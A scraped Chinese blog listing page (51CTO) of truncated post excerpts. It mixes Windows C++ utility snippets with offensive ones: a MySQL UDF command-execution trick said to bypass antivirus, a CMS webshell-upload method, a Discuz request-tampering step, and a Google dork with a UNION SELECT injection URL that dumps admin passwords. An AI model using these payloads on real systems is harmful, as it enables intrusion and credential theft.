51CTO博客开发
测试环境 windows2008R2_64,mysql 5.0.*_32使用的sqlmap中提供的udf.dll 过了nod32,成功上传中间有个误区,刚开始以为是根据系统的版本是否32位、64位来选择dll,在开始上传的64的udf的dll,提示错误,纠结了很久最后上传了一个32位的dll,成功执行:create function sys_eval returns string soname &
原帖地址内容:http://zone.wooyun.org/content/3894用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)1Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"改为1Conte
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
cmd--telnet--输入set localecho
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理员密码/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin /ad.asp?ad='%20union
导出所有的规则到文本中 netsh ipsec static show all > ipsec.txt
//获取当前粘贴板数据//利用场景,用于半自动化,如获取要执行的代码,脚本上传执行,获取返回结果等if ( OpenClipboard(NULL) ) { HANDLE hData
cd /d %~dp0
int VengConfig::GetFileType(LPCTSTR lpszFileName) { CFile file; byte buf[
//引用网上的一篇文章进行的修改 ,2003的所在注册表位置和其他的系统位置不同 //hkey 是注册表主键,如HKEY_LOCAL_MACHINE,szUrl为IP地址(原文中有域名的添加方法,这里去掉了) BOOL VengFuncConfig::SetTrustfulUrl(HKEY hKey, TCHAR
CString VengConfig::GetSysCheckTmpPath(void) { TCHAR TmpPath[MAX_PATH]={0}; LPITEMIDLIST pidl; &n
c++中使用boost::regex(由于标准库中版本过低,导致不支持多行,需手动编译添加最新版的boost库) //如去掉asp、jsp、php文件中的注释 //vs2010中默认的标准库中不支持(?ms)多行,手动编译添加boost::regex库(如boost1.5.2) //FileData为文件内容 &nbs
BOOL CheckConfig::SendCheckRtWithFtp(CString cSendRtFilePath,CString cSaveName) { TCHAR buf[64]={0}; SYSTEMTI
//用'&'或'?'进行连接
//在互斥体的前面加上全局"Global\\",可以使多个session下只运行一个实例 HANDLE hMutex = CreateMutex(NULL, FALSE, _T("Global\\SysCheck")); if
////获取tcp的连接信息 模拟netstat,此处只获取本地开放的端口 ////获取tcp的连接信息 模拟netstat,此处只获取本地开发的端口 vector<int> VengConfig::EnumTCPTable() {&nbs
//获取以系统内置帐户运行的进程的运行路径 wstring GetCurrentDirPath(void) { TCHAR wCurPath[MAX_PATH] = {0}; GetModuleFileNam
参考http://madcloudsong.com/articles/138中的方法 //此处只处理了32位的进程 #include #pragma comment (lib,"psapi.lib") //提升权限 void VengConfig::Adjus
//设置注册表指定的键值 bool SetRegValue(string path,string sSetKey,DWORD dValue) { try {&n
std::string VengFuncConfig::WstringToString(wstring wstr) { string str; int len = WideCharToMultiBy
bool StopNoNeedServices(LPCWSTR ServerName) { SC_HANDLE hScm, hService; SERVICE_STATUS status; &nbs
//禁用tcp/ip上的netbios bool StopTcpipNtBios(void) { try { cout<<
std::string VengFuncConfig::GetLocalHostIp(void) { vector vLocalIpList; string sLocalIP; &n
#pragma comment(lib, "ws2_32.lib") //远程IP,port,要下载的文件的绝对路径,本地保存的绝对路径 bool GetHTTP(string sRemoteIP,u_short nRemotePort,string sRem
bool EnableDebugPriv() { HANDLE hToken; TOKEN_PRIVILEGES tp; LUID luid; &nb
//提升为SE_DEBUG_NAME bool EnableDebugPriv() { HANDLE hToken; TOKEN_PRIVILEGES tp;
1.nmap端口扫描 2.x-scan 系统探测 3.nessus系统漏洞扫描与分析软件 4.Acunetix Web Vulnerability Scanner 8网站及服务器漏洞扫描软件 5.ibm appscan Web应用安全测试工具 6.metasploit 安全漏洞检测工具
详情:http://blog.f4ck.net/archive/sectools3.action 下载地址:http://pan.baidu.com/share/link?shareid=153218&uk=1443404628
#include <iostream> #include "tinyxml.h" #include "tinystr.h" #include <string> #include <windows.h> #in
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号